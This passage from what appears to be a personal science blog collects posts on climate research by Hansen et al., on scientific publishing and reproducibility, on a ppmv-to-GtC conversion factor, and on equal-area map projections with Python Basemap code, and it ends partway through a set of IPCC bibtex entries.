dynamical effects cause ocean surface cooling in the Southern
Ocean and North Atlantic, thus increasing Earth's energy
imbalance and heat flux into most of the global ocean's
surface. Southern Ocean surface cooling, while lower latitudes
are warming, increases precipitation on the Southern Ocean,
increasing ocean stratification, slowing deepwater formation, and
increasing ice sheet mass loss. These feedbacks make ice sheets
in contact with the ocean vulnerable to accelerating
disintegration. We hypothesize that ice mass loss from the most
vulnerable ice, sufficient to raise sea level several meters, is
better approximated as exponential than by a more linear
response. Doubling times of 10, 20 or 40 years yield multi-meter
sea level rise in about 50, 100 or 200 years. Recent ice melt
doubling times are near the lower end of the 10–40-year range,
but the record is too short to confirm the nature of the
response. The feedbacks, including subsurface ocean warming, help
explain paleoclimate data and point to a dominant Southern Ocean
role in controlling atmospheric CO2, which in turn exercised
tight control on global temperature and sea level. The
millennial (500–2000-year) timescale of deep-ocean ventilation
affects the timescale for natural CO2 change and thus the
timescale for paleo-global climate, ice sheet, and sea level
changes, but this paleo-millennial timescale should not be
misinterpreted as the timescale for ice sheet response to a
rapid, large, human-made climate forcing. These climate feedbacks
aid interpretation of events late in the prior interglacial, when
sea level rose to +6–9 m with evidence of extreme storms while
Earth was less than 1 °C warmer than today. Ice melt cooling of
the North Atlantic and Southern oceans increases atmospheric
temperature gradients, eddy kinetic energy and baroclinicity,
thus driving more powerful storms. The modeling, paleoclimate
evidence, and ongoing observations together imply that 2 °C
global warming above the preindustrial level could be
dangerous. Continued high fossil fuel emissions this century are
predicted to yield (1) cooling of the Southern Ocean, especially
in the Western Hemisphere; (2) slowing of the Southern Ocean
overturning circulation, warming of the ice shelves, and growing
ice sheet mass loss; (3) slowdown and eventual shutdown of the
Atlantic overturning circulation with cooling of the North
Atlantic region; (4) increasingly powerful storms; and (5)
nonlinearly growing sea level rise, reaching several meters over
a timescale of 50–150 years. These predictions, especially the
cooling in the Southern Ocean and North Atlantic with markedly
reduced warming or even cooling in Europe, differ fundamentally
from existing climate change assessments. We discuss observations
and modeling studies needed to refute or clarify these
assertions.},
}

arctic unraveling

Report: Arctic Is Unraveling discusses the assessment Snow, Water, Ice and Permafrost and notes the article rising tide — sounds more like Hansen was right.

Again (see “20 years later”, from 2008).

James Hansen, 2016, “Ice melt, sea level rise and superstorms”…

…and what I can say clearly (with a video where he explains the results).

To share this briefly:

Report: Arctic Unraveling, discusses assessment, notes rising tide — sounds more like Hansen was right. links: http://draketo.de/node/764

Information challenges for scientific publishing

On 2015-08-27, researchers from the Reproducibility Project: Psychology reported that in 100 reproduction studies, only “47% of original effect sizes were in the 95% confidence interval of the replication effect size” (RPP SCIENCE 2015; an overview of the results is available in Scientific American, in German from DLF Forschung Aktuell).

I take this worrying result as a cue to describe current challenges to scientific publishing and measures to address them — including reproduction experiments, and what to do if they contest previously published and referenced work.

PDF

PDF (to print)

Org (source)

Scientific publishing has come a long way since its beginning, and its principles have allowed it to scale up from a few hundred active scientists worldwide to conferences with tens of thousands of people for a given topic. But in the last few years it hit its limits. It becomes harder each year to keep up with the number of new papers being published, and even scientists from similar fields repeatedly reinvent the same methods. To scale further and to continue to connect the scientific community, scientific publishing must adapt to make it easier to get an understanding of the current state of science and to keep up to date with new findings.

To grow from these challenges, scientific publishing needs to reconnect the different fields of science through structured overviews, and to keep published results trustworthy through reproducible research, incentives for reproduction studies, and the propagation of corrections.

1 The Good

Before I start with my critique of scientific publishing, I want to show where it really shines. This will put its shortcomings in the proper perspective and also serve as a reminder about methods proven by time. In this part I will focus on the aspects of scientific publishing which help with handling a huge amount of information.

I will also contrast these aspects to ordinary websites, because these have become the standard information medium for non-scientists, yet they took up technology much faster than scientific publishing, which allowed some non-scientific publications to get on par with scientific publications in many aspects and even surpass them in a few.

1.1 Different levels of content

Scientific publications are expected to have a title, keywords, an abstract, an introduction and conclusions - in addition to any other content they have. This makes it easy for readers to choose how deep they want to delve into the topic of the paper.

  • The title and keywords allow readers to decide whether the paper could be important to their own interests.
  • The abstract gives a short take-home message: Just reading the abstract allows remembering later that there was a publication which might be useful for the question at hand.
  • The introduction gives the necessary information to gain a rough understanding of the paper, even if it’s not about ones own speciality.
  • The conclusions provide the results of the publication: If you only read the abstract, the introduction and the conclusions, you can already reason about the impact of the research on your own work.

All this taken together creates a medium where every reader can decide how much information he or she wants to ingest. This allows prioritizing a specific field while still getting a rough understanding of the larger developments happening in similar topics.

Where websites typically only provide one or two representations of any given topic - often title plus teaser and the main text - scientific publications provide several layers of information which are all useful on their own.

1.2 Referencing other works

While the internet allowed ordinary publications to catch up a lot via hyperlinks (though these are still mostly used by hobby-writers and not so much by big newspapers), scientific publication still holds the gold standard for referencing other works in a robust way.

They include the title, the author, the journal, the date of publication and a link. Even if the journal dies and the DOI system breaks, a paper can still be found in third party databases like university libraries.

In the internet however, links regularly break, even those referenced in court cases. So here the web still has a lot to learn from the tried and true practices of scientific publishing.

(In the meantime, if you’re a blogger yourself, please preserve your links (German original))

1.3 Summary

The different levels of information and the robust references create a system which managed to sustain its quality during a growth in the number of researchers and publications by several orders of magnitude.

These two topics aren’t the only strengths of scientific publishing (its strengths also include the peer review process, in which a trusted editor asks people from the same field to provide high-quality feedback), but they are the most important ones for the next part, which identifies challenges that need to be resolved to preserve the integrity of scientific publications and to reduce the fragmentation of science by keeping researchers connected with current work from other groups.

2 The Challenges

2.1 Core Questions

The gist of the challenge of scientific publishing can be summarized in two questions:

  • “What is the expected reading for scientists?”
  • “How do you know that you can trust this paper?”

Journals are already trying to tackle both of these, but the current steps fall far short of solving the problem.

2.2 Expected reading for scientists

Suddenly you realize that there is a group of scientists in Korea who also work in your field.

This actually happened: I shared a paper with experts in the field who did not even know that the group doing the research existed.

The problem behind this experience is that the number of scientists increased more than a hundredfold (at EGU more than 15000 people met, and that’s only for earth sciences), but scientific publishing still works much like it did when there were only a few hundred (communicating) scientists worldwide. And the pressure to publish as much as possible intensifies the problem a lot.

In a field like Physics of the Atmosphere, hundreds of papers are published every month. Even the reading list filtered by interest which I get by e-mail every week contains several tens of papers per journal. And when I started to dive into my research field at the beginning of my PhD, a huge challenge was to get the basic information. It’s easy to find very detailed information, but getting the current state of scientific knowledge for a given field takes a lot of effort, especially if you don’t start in a group working on the same topic. So how should scientists keep a general knowledge of the broader field, if it’s already hard to get into one given field?

The current answers are review papers and books. Good review papers allow understanding a core topic of a given scientific community within a few days. A nice example is Data assimilation: making sense of Earth Observation. A book gives a good overview of a given field, but it requires a hefty time investment. So how do you keep a general understanding of other fields? How can we avoid reinventing the wheel again and again, just in different contexts?

A simple idea to achieve this would be to create a hierarchy of quarterly overviews:

  • STEM/MINT and social sciences.
  • A broad field (like atmospheric physics).
  • A specific subgroup (about 100 scientists).

With every overview including two aspects:

  • The state of scientific knowledge.
  • Core changes since the last overview.

The core changes would be suggested reading for all scientists in the given field, while the state of scientific knowledge would allow people to get up to speed in a given field, or to understand something interesting, and provide a path to the more detailed reviews and papers.

Assuming that on average 2-3 broad fields and subgroups are interesting to a scientist, this would allow keeping up to date with scientific development by reading one overview paper per month, and it would allow getting a broad understanding of many fields by reading the overview of an additional field every quarter.

These structured overviews would reconnect science.

To support the creation of the overviews, we might need more dedicated, paid overview writers.

Part of this job is currently done by publications like Annual Reviews, Physik-Journal (German) and Scientific American (in order of decreasing specialization), and awareness of the need to reconnect science could make it possible to extend these and similar publications to make it easier to acquire and keep a good understanding of the current state of science.

2.3 Trustworthy research

The second big question is: “How do you know that you can trust this paper?” To be able to trust the results shown in any paper, there are two aspects:

  1. It must be possible to reproduce the results independently, and
  2. The prior assumptions of the research have to be correct.

2.3.1 Reproducible research

The first problem can be tackled by requiring scientists to share the data they analyzed and the programs they used, so others can reproduce the results (plots, table contents and so on) with as little effort as possible. Ideally the paper should use something like autotools and org mode (German original) to create a distribution package which allows others to reproduce the paper straight from the data and which ensures that the data in the package actually suffices to generate the results. This would ensure that papers provide all the small details which might not seem worthy of publication on their own but can be essential for reproducing the results with a new experimental setup.

The article Sloppy Papers (by Dennis Ogbe, 2016-04-05) provides an example of the pain caused by non-reproducible publishing, for a paper which was cited over 1500 times.

Aside from making it possible for others to reproduce your work, this also makes it easy to go back years later and answer the question:

  • „How exactly did I create the publication?“

The minimal requirements for a system for reproducible research are:

  • Create diagrams and tables directly from the data
  • Include required data and scripts (as much as allowed)
  • Automate creating the publication and checking whether it fulfills the first two requirements

That data and scripts should be under Open Access licenses for this to work should be self-evident. It is about enabling easy reproduction, and that requires building upon the previous work.

Basic reproduction of the results would then be as simple as calling

./configure; make

An example for such a system is GNU automake which provides a make distcheck command to verify that the released data suffices to create the publication. If you want to give this a try, have a look at Going from a simple Makefile to Autotools.
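
As a sketch of the first requirement (creating diagrams directly from the shipped data), the build could call a small script like the following; the file names are made up for the example:

#!/usr/bin/env python
# make-figure.py: regenerate one figure of the paper directly from the shipped data.
# Called from the build (e.g. from make), so packaging fails if the data file
# is missing from the distribution.
import numpy as np
import pylab as pl

data = np.loadtxt("data/measurements.csv", delimiter=",")  # example file name
pl.plot(data[:, 0], data[:, 1])
pl.xlabel("time [days]")
pl.ylabel("measured value")
pl.savefig("figure-1.png")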

2.3.2 Incentives

The main challenge for such reproducibility is not technical, however. It is the competition forced upon scientists by the need to apply for external funding. If you release your scripts and data, you cannot monopolize them to apply for follow-up funding. On the other hand, publishing the scripts and data can help get more visibility and citations. To create incentives for publishing everything used in the research, there also need to be incentives for publishing reproduction studies.

For the publishing scientist, people who use the research provide references. If other scientists in the same field reproduce research locally, that encourages follow-up research which might reference the original scientist, but it is a game of luck whether other scientists will actually use and reference the published data and scripts, just use them as inspiration, or ignore them entirely because they have to focus on work they can publish to make it into the next round of funding. As such, the incentive to create research which is easy to reproduce would rise a lot if reproduction studies could be published more easily, because every reproduction publication would provide a reference. If we want more reproduction of research, skillful reproduction has to provide value for scientists in its own right.

The focus I put on reproducibility does not mean that errors in publications are widespread. There are some fields with problems – for example research on new medicines, where there is lots of pressure to have a positive result, since that is required to sell a new product – but most scientific publications are sound, even where there are incentives to cut corners. Most scientists value their scientific integrity more than money, the review process works pretty well at catching inaccuracies, and the penalty for being caught red-handed is severe.

However, if there are no easy means to reproduce a given result, sincere errors are hard to detect, and it might take years until they show up. Requiring better reproducibility would make detecting them much easier. Where full source data cannot be shared, it is often possible to provide example data, so this is a problem of process and legalities, not of practical feasibility.

2.3.3 Propagating corrections

The second problem, however, is harder: what happens if an error does go undetected? Papers usually cite other papers to provide references to the foundation they build upon, but when a paper has to be corrected, only that paper is changed, even though the correction affects all papers which cited it. This destabilizes the foundation of science, which is made worse by the sheer volume of publications: a new paper contesting the existing one will be missed by most people. If a (relevant) error in even a single publication goes undetected, it can turn up in many more publications which build upon the research.

To fix this, the journals could explicitly propagate the correction: When a publication contradicts a previous publication, the journal marks the previous publication as contested. If the authors of the previous publication support the claim, the publication is marked as corrected and all works which cited it are marked as unstable. Since the journals usually know in which part of the publication the corrected paper was cited (it’s in the LaTeX source), they could highlight the impacted parts and then check whether the correction affects the core message of the citing publication.

A common example which shows the two different cases is results referenced in the introduction. Often these provide background which motivates the relevance of the research, but some are used as a basic assumption for the rest of the paper. In the first case, a correction of the cited paper is inconsequential for the citing paper; the contested status need not be propagated to other papers using the results of the citing paper. In the second case, however, the correction might invalidate the foundation of the citing paper, which casts doubt on its results and needs to be propagated to all papers which reference them.

Marking papers as contested could easily be accomplished by creating corresponding microformats: When publishing a paper A which corrects an earlier paper B, add a link to the earlier paper which says "A corrects B" (marked in microformat syntax to make it machine readable). As a second step, inform the journal which published the earlier paper. The journal then marks that paper as "contested by A" and asks its authors for comment. If they agree that they were corrected, the earlier paper gets marked as "corrected by A". If they do not agree, the dispute gets marked as "B contests A". That way journals could routinely scan the research cited in the papers they publish to ensure that all the assumptions used in those papers are solid - which would allow them to provide additional value to their readers: show the last time all references were checked to ensure that they weren't contested - and if a reference is contested, check whether its correction impacts the core message of the research.

It would strengthen the role of journals as guardians for the integrity of scientific publication.
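
To make the propagation step concrete, here is a toy sketch of the bookkeeping described above (the paper identifiers, the citation graph and the status names are invented for the example):

# Toy model of propagating a correction through a citation graph.
# cited_by maps each paper to the papers which cite it.
cited_by = {
    "B": ["C", "D"],   # the corrected paper B is cited by C and D
    "C": ["E"],
    "D": [],
    "E": [],
}
status = {}

def mark_corrected(paper):
    """Mark paper as corrected and all directly or indirectly citing papers as unstable."""
    status[paper] = "corrected"
    todo = list(cited_by.get(paper, []))
    while todo:
        citing = todo.pop()
        if status.get(citing) == "unstable":
            continue                   # already propagated along this branch
        status[citing] = "unstable"    # needs a check by its authors and journal
        todo.extend(cited_by.get(citing, []))

mark_corrected("B")
print(status)   # B corrected; C, D and E marked unstable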

2.4 Summary

With the current state of scientific publishing, it is hard to keep a general knowledge of related fields, which leads to repeatedly reinventing the same methods in different contexts. Also, errors which make it through the review process and get referenced by other publications can persist in those publications even after they have been corrected in the original one.

These challenges can be addressed by periodic overviews at different levels of specialization, reporting on both the state and the changes of scientific knowledge and methods, by more support for reproducible research and reproduction studies and by propagating corrections to papers into those which reference them.

3 Conclusions

3.1 Conclusions

Many aspects of scientific publishing are unmatched even with all the new development in the web, but the rising number of publications per year creates new challenges.

To meet these challenges, structured overviews and high-level updates to the current state of the art could help reconnecting different fields of science, and reproducible research, incentives for reproduction studies and propagating corrections to papers could ensure that published results stay trustworthy with the growing number of active scientists.

There are already journals and organizations which try to fill the role of reconnecting science, so I am confident that these problems will be addressed with time. I hope that this article can contribute by providing an overview of the challenges and a clear vision of the questions which need new and improved answers with the growing number of scientists and publications:

  • “What is the expected reading for scientists?”
  • “How do you know that you can trust this paper?”

A final word of warning:

When a measure becomes a target, it ceases to be a good measure. — Goodhart’s law (quote, background)

If publishing is a goal, it cannot be a good metric of the quality of scientific work, regardless of the amount of convolution we add.

Attachment (size):
2014-11-28-Fr-information-challenges-scientific-publishing.org (18.93 KB)
2014-11-28-Fr-information-challenges-scientific-publishing.pdf (184.53 KB)

propagating changes; comment on "Time To Rethink Retractions And Corrections?"

A comment on Amending Published Articles: Time To Rethink Retractions And Corrections? (doi: 10.1101/118356) which asks for making it easier and less of a matter of guilt to change published articles.

Update: Leonid Schneider from forbetterscience notes that there’s a whole dungeon of misconduct which might be facilitated by “living papers”. We need to investigate problems in depth before changing established processes. Scientific communication is a complex process. Publication is an important part of it.

First off: The underlying problem which makes it so hard to differentiate between honest errors and fraud is that publications are a kind of currency in science. It is not possible to make them serve a dual function — not only scientific communication but also the main currency to get a job in science — without also getting fraud. If you want a short quotation for that, you can take Goodhart's law:

When a measure becomes a target, it ceases to be a good measure. — Goodhart’s Law

We cannot reach the best possible level of scientific communication while publications are part of the currency of science. And there is no metric which can fix this.

That said, I’m happy to see you take up changes to scientific articles! It ties into concepts for propagating corrections which I wrote about two years ago: Information challenges section 2.3.3: Propagating corrections (this is a section in a larger article about information challenges for scientific publishing)

Note however that if you have living documents and only the latest version of the document is treated as authoritative, then scientific information propagation becomes orders of magnitude more expensive. There must be a clear distinction between changes which invalidate anything others might have built upon and changes which keep all the citable information the same. As I showed in the article I linked to, there are technical measures which could reduce the cost of propagating corrections. If you make corrections easier, then these measures will become essential.

Guilt should not be the problem (and should not be part of making a change). The actual problem is that a change to a published paper incurs a cost on everyone who cited it.

Keep in mind that when you change an article, you need to inform everyone who cited it.

Journals could reduce this cost on authors by checking where the article was cited and whether the change is relevant to the reliability of the citing article. If it is, then the author of the citing article must take action. With highly cited articles, a single amendment could require hundreds of scientists to take action and amend their articles as well; if it affected the core message of the article, this could cause ripples of ever more articles to amend. There are two core ways to minimize this: amend quickly, while the article has few citations, and ensure high quality and consequently a low rate of invalidating changes for published articles.

In the article I posted,1 I suggested using microformats to mark amendments. Their important attribute is that they can be parsed automatically, that anyone with access to the source of a publication can automate checking for the region in which a given reference was used, and that they are not tied to any given platform. Any other method which has these properties works as well.

Keep in mind, however, that while anyone can search through those updates, someone must do it. To make the system reliable, that someone will have to be paid.


  1. Information Challenges for Scientific Publishing, section 2.3.3: Propagating corrections: http://www.draketo.de/english/science/challenges-scientific-publishing#sec-2-3-3 

Conversion factor from ppmv CO₂ to Gt C

I just spent half an hour on finding the references for this, so I can spend 5 minutes providing it for others on the web.

conversion factor footnote

The conversion factor from ppmv CO\(_2\) to GtC is 2.14, calculated from the molar mass of roughly \(M_{\text{CO}_{2}} = 44 g/mol\) for carbon dioxide, the molar mass of \(M_{\text{C}} = 12 g/mol\) for carbon, \(M_{\text{air}} = 28.9 g/mol\) for air (Halliday et al., 2003) and \(m_{\text{air}} = 5.15 \times 10^{6} Gt\) for the total mass of the air (Trenberth and Smith, 2005): \(\left ( \frac{M_{\text{air}}}{M_{\text{CO}_{2}}} · \frac{M_{\text{CO}_{2}}}{M_{C}} · \frac{1}{m_{\text{air}}} \right )^{-1}\)

(let ((Mco2 44.0) ; g / mol
      (Mair 28.9) ; g / mol
      (Mc 12.0) ; g / mol
      (mair 5.15)) ; 1,000,000 Gt
  (/ 1
     (* (/ Mair Mco2)
        (/ (/ Mco2 Mc) mair))))
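
The same calculation in Python, with the unit bookkeeping spelled out (same input values as above):

# Conversion factor from ppmv CO2 to GtC, same numbers as the Emacs Lisp above.
M_air = 28.9         # g/mol, air
M_c = 12.0           # g/mol, carbon
m_air = 5.15e21      # g, total mass of the atmosphere (5.15e18 kg)

grams_per_gt = 1e15  # 1 Gt = 1e9 t = 1e15 g
ppmv = 1e-6          # one part per million by volume = a mole fraction of 1e-6
factor = ppmv * (m_air / M_air) * M_c / grams_per_gt
print(round(factor, 2))   # 2.14 GtC per ppmv CO2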

Halliday et al., 2003: Halliday, D., Resnick, R., Walker, J., and Koch, S. (2003). Physik. Wiley.

Trenberth and Smith, 2005: Trenberth, K. E. and Smith, L. (2005). The mass of the atmosphere: A constraint on global analyses. Journal of Climate, 18(6):864–875.

PS: GtC Gigaton Carbon = PgC Petagram Carbon; ppmv CO₂ = parts per million (in volume) carbon dioxide in air.

Attachment (size):
conversion-factor-ppmv-co2-to-gtc.png (18.27 KB)

Equal-Area Map Projections with Basemap and matplotlib/pylab

PDF (read as slides)

Org (reproduce)

Plotting global equal area maps with python, matplotlib/pylab and Basemap.


1 Problem

1.1 lat/lon pixels misrepresent areas

  • Simple flat map: sibiria-china-flat.png
  • Globe: sibiria-china-globe.png

  Note: Siberia covers 13.1 · 10⁶ km², China 9.7 · 10⁶ km².

  Maps thanks to Marble Desktop Globe and Open Street Map, available under CC by-sa and the Open Data Commons Open Database License (ODbL).


2 Map-Notes

2.1 Map Projections

  1. Hobo-Dyer
      • Rectangle
      • equidistant longitudes
      • true to scale at the latitude of the Mediterranean Sea (more exactly: \(37.5^\circ\))
      • Similar maps: Gall-Peters (thinner), Lambert (wider)
      • Basemap: equal area cylindrical (cea) with lat_ts=37.5

  2. Hammer
      • Elliptic
      • Low distortion at the poles
      • 2:1 aspect ratio → 2 maps per page
      • the earth appears round without making it hard to recognize patterns
      • Similar maps: Mollweide (more distorted at the poles, parallel latitudes)
      • Basemap: hammer

  3. Flat Polar Quartic
      • Elliptic with polar cuts
      • parallel latitudes
      • Standard parallels at \(33^\circ 45' N/S\)
      • poles are \(\frac{1}{3}\) the length of the equator
      • Similar: Eckert IV (poles are half the equator)
      • Basemap: mbtfpq


3 Plotted

3.1 Hobo-Dyer

m = map.Basemap(projection='cea', lat_ts=37.5)
outfile = "hobo-dyer.png"
pl.title("Hobo Dyer: Cylindric Equal Area at $37.5^\\circ N$")

hobo-dyer.png

3.2 Hammer

m = map.Basemap(projection='hammer', lon_0=0)
outfile = "hammer.png"
pl.title("Hammer") # latex-test: $\frac{1}{2}$

hammer.png

3.3 Flat Polar Quartic

m = map.Basemap(projection='mbtfpq', lon_0=0)
outfile = "flatpolarquartic.png"
pl.title("Flat Polar Quartic: parallels at $33^\\circ 45' N/S$")

flatpolarquartic.png
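
If you want to reproduce one of these plots outside of the Org document, a minimal self-contained sketch (using only the Basemap calls that also appear in the appendix below) looks like this:

# Standalone version of the Hammer plot: coastlines plus Tissot's indicatrices
# to visualize how the equal-area projection treats areas.
import numpy as np
import pylab as pl
import mpl_toolkits.basemap as map

m = map.Basemap(projection='hammer', lon_0=0)
m.drawcoastlines()
m.drawmapboundary(fill_color='aqua')
m.fillcontinents(color='coral', lake_color='aqua')
for lat in np.arange(-60, 90, 30):
    for lon in np.arange(-150, 180, 60):
        m.tissot(lon, lat, 4.0, 100, facecolor='green', zorder=10, alpha=0.5)
pl.title("Hammer")
pl.savefig("hammer-standalone.png")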

4 Other maps

4.1 Other Equal Area map types

  • Goode homolosine: Split, focus on land or ocean, straight latitude parallels, approximately preserve most shapes. Not available in matplotlib.
  • Eckert IV: Like Flat Polar Quartic, parallels at 40° 30' N/S, poles are half the equator.
  • Lambert cylindrical equal area: Like Hobo Dyer, very wide, shapes at the equator are correct.
  • Gall Peters: Like Hobo Dyer, appears more distorted than Hobo-Dyer, shapes over Europe correct (45°).
  • Mollweide: Like Hammer with straight latitude parallels.
  • Werner: It’s a heart :) - focus on a hemisphere without ignoring the rest. General case: Bonne.
  • Tobler: General case leading to Lambert, Mollweide, Mollington and a few more — also see Tobler1973 after you manage to gnaw through the paywall…
  • Collignon: Triangle, for cosmic microwave background.

5 Conclusion

5.1 Maps I plan to use

  1. Hobo-Dyer

      hobo-dyer.png

      To show regional fluxes and longitudinally constrained regions: easy to spot on a rectangular grid.

  2. Hammer

      hammer.png

      To show a global overview: helps the understanding of global data because it appears most similar to a real earth while including the whole earth surface.

  3. Flat Polar Quartic

      flatpolarquartic.png

      For mainly latitudinally constrained regions: straight latitudinal lines and high latitudinal resolution near the poles.



6 Thank you!

6.1 Thank you for listening!

Questions?

7 Appendix: Supporting functions

7.1 Basemap Imports

# basemap, pylab and numpy for plotting
import mpl_toolkits.basemap as map
import pylab as pl
import numpy as np
# netcdf for reading the emission files
import netCDF4 as nc

7.2 Draw a map

<<addmapfeatures>>
<<addindicatrix>>
try:
  <<addemissions>>
  <<addcolorbar>>
except RuntimeError: # recover from missing fluxfile
  m.fillcontinents(color='coral',lake_color='aqua')
pl.savefig(outfile)
return "./" + outfile + ""

7.3 Map features

# add map lines
m.drawcoastlines()
# only fill continents if we do not plot emissions
# m.fillcontinents(color='coral',lake_color='aqua')
m.drawparallels(np.arange(-90.,120.,30.), 
                labels=[False,True,True,False])
m.drawmeridians(np.arange(0.,420.,60.), 
                labels=[True,False,False,True])
m.drawmapboundary(fill_color='aqua')

7.4 Tissot's Indicatrix

# draw tissot's indicatrix to show distortion.
for y in np.linspace(m.ymax/20,19*m.ymax/20,9):
    for x in np.linspace(m.xmax/20,19*m.xmax/20,12):
        lon, lat = m(x,y,inverse=True)
        poly = m.tissot(lon,lat,4.0,100,
                        facecolor='green',
                        zorder=10,alpha=0.5)

7.5 Plot emissions

# d = nc.Dataset("/run/media/arne/3TiB/CTDAS-2013-03-07-2years-base-data/"
#                "analysis/data_flux1x1_weekly/flux_1x1.nc")
d = nc.Dataset("UNPUBLISHED")
biocovmean = np.mean(
    d.variables["bio_flux_prior_cov"][:,:,:], axis=0)
# projection: matplotlib.org/basemap/users/examples.html
lons, lats = pl.meshgrid(range(-180, 180), 
                         range(-90, 90))
x, y = m(lons, lats)
# choose my standard color range: vmin = -0.5*vmax
vmax = max(abs(np.max(biocovmean)), 
           2 * abs(np.min(biocovmean)))
vmin = -0.5*vmax
m.pcolor(x, y, biocovmean, shading='flat', 
         vmin=vmin, vmax=vmax) # pcolormesh is faster

7.6 Nice colorbar

pl.rcParams.update({"text.usetex": True, 
                    "text.latex.unicode": True})
colorbar = pl.colorbar(orientation="horizontal", 
                       format="%.2g") # scientific
colorbar.set_label("$CO_{2}$ fluxes [$\\frac{mol}{m^2 s}$]")

Author: Arne Babenhauserheide

Emacs 24.3.1 (Org mode 8.0.2)


Attachment (size):
flatpolarquartic.png (127.57 KB)
hobo-dyer.png (139.26 KB)
hammer.png (138.15 KB)
sibiria-china-flat.png (1.14 MB)
sibiria-china-globe.png (1.14 MB)
equal-area-map-projections.pdf (3.06 MB)
equal-area-map-projections.org (10.19 KB)

Hansen 2017: Young people's burden: requirement of negative CO₂ emissions

James Hansen et al. published a paper about the expected costs due to climate change, aptly named "Young people's burden".

Young people's burden: requirement of negative CO2 emissions

Figure: Temperature anomalies (Hansen et al. 2017, License: cc-by)

The paper builds on a previous paper by Hansen et al. (2016) which I summarized in Hansen 2016 got through peer-review — “Ice melt, sea level rise and superstorms”. Hansen 2016 ends with many questions which need to be addressed.

Hansen 2017 says in the abstract:

We show that global temperature has risen well out of the Holocene range and Earth is now as warm as it was during the prior (Eemian) interglacial period, when sea level reached 6–9 m higher than today. Further, Earth is out of energy balance with present atmospheric composition, implying that more warming is in the pipeline, and we show that the growth rate of greenhouse gas climate forcing has accelerated markedly in the past decade.

In short: We knew for 35 years that this was coming,1 and we failed to stop it. Now we have to fight hard to avoid the worst of the expected fallout.

However, it keeps a sliver of hope of avoiding the global chaos which would be likely to ensue if most coastal cities were flooded and hundreds of millions of people needed to relocate:

Keeping warming to less than 1.5 °C or CO₂ below 350 ppm now requires extraction of CO₂ from the air. If rapid phaseout of fossil fuel emissions begins soon, most extraction can be via improved agricultural and forestry practices.

All the details are available in Hansen, J., Sato, M., Kharecha, P., von Schuckmann, K., Beerling, D. J., Cao, J., Marcott, S., Masson-Delmotte, V., Prather, M. J., Rohling, E. J., Shakun, J., Smith, P., Lacis, A., Russell, G., and Ruedy, R.: Young people's burden: requirement of negative CO2 emissions, Earth Syst. Dynam., 8, 577-616, https://doi.org/10.5194/esd-8-577-2017, 2017


  1. Climate Impact of Increasing Atmospheric Carbon Dioxide J. Hansen, D. Johnson, A. Lacis, S. Lebedeff, P. Lee, D. Rind, G. Russell, NASA Institute for Space Studies, Goddard Space Flight Center, 1981. Abstract: The global temperature rose by 0.2°C between the middle 1960's and 1980, yielding a warming of 0.4°C in the past century. This temperature increase is consistent with the calculated greenhouse effect due to measured increases of atmospheric carbon dioxide. Variations of volcanic aerosols and possibly solar luminosity appear to be primary causes of observed fluctuations about the mean trend of increasing temperature. It is shown that the anthropogenic carbon dioxide warming should emerge from the noise level of natural climate variability by the end of the century, and there is a high probability of warming in the 1980's. Potential effects on climate in the 21st century include the creation of drought-prone regions in North America and central Asia as part of a shifting of climatic zones, erosion of the West Antarctic ice sheet with a consequent worldwide rise in sea level, and opening of the fabled Northwest Passage. 

Attachment (size):
hansen2017--001.png (820.94 KB)

Hitchhikers Guide on Towels - Read from Space

Samantha Cristoforetti reads the Hitchhikers Guide to the Galaxy on the International Space Station

This is the world we live in: The Hitchhikers Guide read from Space.

If you don’t get goosebumps just thinking about it, envision it again: The old visions are becoming real step by step, and now those who actually venture into space read the works of visionaries from their temporary home beyond the atmosphere.

New traditions form from a reality which still seems unreal.

The Hitchhikers Guide read from Space.

And yes, we had a towel with us when the kids and I went riding their scooters yesterday. We used it to dry ourselves when we came back from the rain.

I wonder when I should start reading them the Hitchhikers Guide…

IPCC bibtex entries

I repeatedly stumbled over needing bibtex entries for the IPCC reports. So I guess others might stumble over that, too. Here I share my bibtex entries for some parts of the IPCC reports.1

IPCC 1990 WG1 (physical science basis)

@BOOK{IPCC1990Science,
  title = {Climate Change: The IPCC Scientific Assessment},
  publisher = {The Intergovernmental Panel on Climate Change},
  year = {1990},
  editor = {J.T. Houghton and G.J. Jenkins and J.J. Ephraums},
  author = {IPCC Working Group I}
}

IPCC 1995 WG1 (physical science basis)

@BOOK{IPCC1995Science,
  title = {Climate Change 1995 The Science of Climate Change},
  publisher = {The Intergovernmental Panel on Climate Change},
  year = {1996},
  editor = {J.T. Houghton and L.G. Meira Filho and B.A. Callander and N. Harris
    and A. Kattenberg and K. Maskell},
  author = {IPCC Working Group I}
}

IPCC 2013 WG1 (physical science basis)

@book{IPCCWG1PhysicalStocker2013,
   author = {IPCC},
   title = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   pages = {1535},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book}
}

@inbook{IPCCPolicymakersStocker2013,
   author = {IPCC},
   title = {Summary for Policymakers},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {SPM},
   pages = {1–30},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.004},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCSummaryStocker2013,
   author = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Alexander, L.V. and Allen, S.K. and Bindoff, N.L. and Bréon, F.-M. and Church, J.A. and Cubasch, U. and Emori, S. and Forster, P. and Friedlingstein, P. and Gillett, N. and Gregory, J.M. and Hartmann, D.L. and Jansen, E. and Kirtman, B. and Knutti, R. and Krishna Kumar, K. and Lemke, P. and Marotzke, J. and Masson-Delmotte, V. and Meehl, G.A. and Mokhov, I.I. and Piao, S. and Ramaswamy, V. and Randall, D. and Rhein, M. and Rojas, M. and Sabine, C. and Shindell, D. and Talley, L.D. and Vaughan, D.G. and Xie, S.-P.},
   title = {Technical Summary},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
